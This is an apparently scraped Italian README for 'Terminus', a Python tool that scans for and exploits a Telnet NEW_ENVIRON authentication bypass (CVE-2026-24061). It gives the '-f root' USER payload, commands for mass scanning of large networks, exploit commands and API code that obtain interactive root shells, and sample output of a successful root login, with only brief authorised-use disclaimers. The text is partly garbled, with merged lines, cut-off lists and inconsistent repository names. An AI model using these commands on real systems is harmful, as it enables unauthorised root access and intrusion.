
AsyncIO Scanner & Exploitation Framework per CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Include scoperta ad alta concorrenza, fingerprinting passivo ed escalation autorizzata a shell di root.
Un motore di analisi della sicurezza per la vulnerabilità di bypass dell'autenticazione ed escalation dei privilegi Telnet NEW_ENVIRON CVE-2026-24061.

Terminus è uno strumento professionale di ricerca sulla sicurezza progettato per test di penetrazione autorizzati e valutazione delle vulnerabilità di CVE-2026-24061. Questa vulnerabilità critica colpisce le implementazioni legacy dei daemon Telnet, consentendo a utenti remoti non autenticati di bypassare l'autenticazione e ottenere accesso a livello root.
CVE-2026-24061 è una vulnerabilità di Esecuzione Remota di Codice nei servizi Telnet che supportano RFC 1572 (Opzione Ambiente Telnet). La vulnerabilità sfrutta una sanificazione impropria della variabile d'ambiente USER durante la subnegoziazione NEW_ENVIRON:
USER=john → richiede la passwordUSER=-f root → bypassa l'autenticazione, concede una shell rootImpatto:
Servizi interessati:
192.168.0.0/24, 10.0.0.0/8)--verify): Proof-of-exploit, conferma l'accesso root uid=0Terminus.handshake() - Handshake conforme a RFC 854Terminus.exploit() - Consegna del payload per CVE-2026-24061--exploitIl cuore di Terminus è la classe TerminusNegotiator, che fornisce una separazione pulita tra la gestione del protocollo e la logica di sfruttamento:```python
from terminus import TerminusNegotiator
negotiator = TerminusNegotiator()
await negotiator.handshake(target="192.168.1.100", port=23)
result = await negotiator.exploit(payload="-f root")
if result.success: print(f"Root shell acquired: {result.evidence['uid']}")
### Approccio Motore vs. Script
**Script tradizionali** (strumenti esistenti):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
Motore Terminus:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report
---
## Installazione
### Requisiti
- **Python 3.10+**
- **Piattaforme supportate:**
- Windows 10/11 (PowerShell)
- Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
- Linux nativo (Kali, Parrot, Ubuntu, Debian)
- macOS (con Python 3.10+)
### Avvio rapido (Tutte le piattaforme)
#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406
chmod +x setup_env.sh ./setup_env.sh
source venv/bin/activate
terminus --version
#### Installazione Manuale (Tutte le Piattaforme)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406
# Create virtual environment
python3 -m venv venv
# Activate (Linux/macOS/WSL)
source venv/bin/activate
# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1
# Install dependencies
pip install -e .
# Verify
terminus --version
telnetlib3 - Implementazione del protocollo Telnet AsyncIOrich - UI e formattazione del terminale (supporto ANSI su Windows/Linux)pydantic - Validazione dei dati e modelliaiofiles - I/O asincrono dei filejinja2 - Templating dei reportpyyaml - Gestione della configurazionepathlib - Gestione dei percorsi cross-platform (integrato)Nota: Tutte le dipendenze sono puramente Python o dispongono di wheel cross-platform. Nessuna compilazione specifica per piattaforma richiesta.
Abilita il completamento con tab per un inserimento più rapido dei comandi:
_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc
_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression
Provalo:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.
---
## Utilizzo
### Modalità di Scansione
#### Scansione di un Singolo Target```bash
terminus scan -t 192.168.1.100
terminus scan -t 192.168.1.0/24
#### Scansione Batch Basata su File```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500
terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200
### Modalità di Rilevamento
#### Rilevamento Passivo (Predefinito - Sicuro)```bash
terminus scan -t target.com --passive-only
terminus scan -t target.com --aggressive
#### Modalità di Verifica Attiva (Proof-of-Exploit)```bash
terminus scan -t 192.168.1.100 --verify
Controlla la versione:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db
**Scansione passiva (predefinita - valutazione del rischio conservativa):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Parsing 1 targets...
Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00
╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061 │
│ Total Targets: 1 │
│ Scanned: 1 │
│ Failed: 0 │
│ Timeouts: 0 │
│ │
│ Vulnerability Breakdown: │
│ Critical: 0 │
│ High: 0 │
│ Medium: 0 │
│ Low: 1 │
│ Info: 0 │
│ │
│ Duration: 3.53s │
│ Avg Scan Time: 3522.22ms │
│ │
╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low │ unknown │ Unknown │ YES │ - │ 3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
No vulnerable targets found
Verifica attiva con --verify (proof-of-exploit):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify
Parsing 1 targets... Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00
╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
Found 1 vulnerable targets!
**Sfruttamento interattivo:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Attempting exploitation of 172.17.45.122:2323...
Payload: -f root
CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained
[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit
whoami
root
┌──[root@parrot]─[~]
└──╼ #
Osservazioni chiave:
Cosa fa:
-f rootuid=0 nella rispostaCasi d'uso:
Esempio di output:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A
**Verifica in batch:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json
Nota: La verifica attiva tenta lo sfruttamento. Utilizzare solo con la dovuta autorizzazione.
terminus scan -t 192.168.1.0/24 -o json > results.json
#### Report HTML```bash
terminus scan -f targets.txt -o html -w report.html
terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv
### Exploitation (Solo Uso Autorizzato)
#### Shell Interattiva```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target
terminus exploit -t 192.168.1.100 -c "id"
#### Payload Personalizzato```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"
terminus update-signatures
#### Verifica i risultati precedenti```bash
terminus verify -f results.json
terminus version
---
## Configurazione dell'Ambiente di Test
### Per il Red Team: Distribuzione Cross-Platform
**Terminus è progettato per la distribuzione portatile** - copia la directory su qualsiasi sistema Windows/Linux ed eseguilo senza installazione:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative
# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24
# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml
Consigliato per workstation Red Team Windows - ambiente Linux isolato per distribuire servizi di test vulnerabili:
wsl --install
wsl --install -d kali-linux
wsl -l -v
#### Dentro di WSL2 (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y
# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv
# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump
# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate
ATTENZIONE: Solo in ambienti di laboratorio isolati. Mai su sistemi di produzione.```bash
sudo apt install netkit-telnetd=0.17-*
sudo systemctl restart inetd
### Matrice di Test Cross-Platform
Testa Terminus su tutte le piattaforme utilizzate dal tuo Red Team:
| Piattaforma | Installazione | Scansione | Exploitation |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | Sì | Sì | Sì |
| WSL2 - Kali Linux | Sì | Sì | Sì |
| WSL2 - Parrot OS | Sì | Sì | Sì |
| WSL2 - Ubuntu | Sì | Sì | Sì |
| Kali Linux nativo | Sì | Sì | Sì |
| Parrot OS nativo | Sì | Sì | Sì |
| macOS | Sì | Sì | Sì |
---
## Riferimento API
### Integrazione Python```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore
async def scan_network():
# High-level scanner
async with TerminusScanner() as scanner:
async for result in scanner.scan_targets(["192.168.1.0/24"]):
if result.risk_score == RiskScore.CRITICAL:
print(f"CRITICAL: {result.target}")
print(f" Daemon: {result.daemon_type} {result.version}")
print(f" Confidence: {result.vulnerability_confidence:.2%}")
async def exploit_target():
# Direct engine usage
negotiator = TerminusNegotiator()
# Handshake
success = await negotiator.handshake(target="192.168.1.100", port=23)
if not success:
print("Handshake failed")
return
# Exploit
result = await negotiator.exploit(payload="-f root")
if result.success:
print(f"Root access obtained")
print(f"Evidence: {result.evidence}")
# Run
asyncio.run(scan_network())
Questo strumento è destinato SOLO a:
L'uso non autorizzato è ILLEGALE e non etico.
--exploitSe scopri sistemi vulnerabili utilizzando Terminus:
Tutti i percorsi sono relativi alla radice del progetto - funziona su Windows, Linux e WSL senza modifiche:```yaml
scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second
detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true
signatures_db: "./signatures.db"
exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true
reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"
output_dir: "./reports"
logging: level: "INFO"
file: "./logs/terminus.log" format: "json" console_enabled: true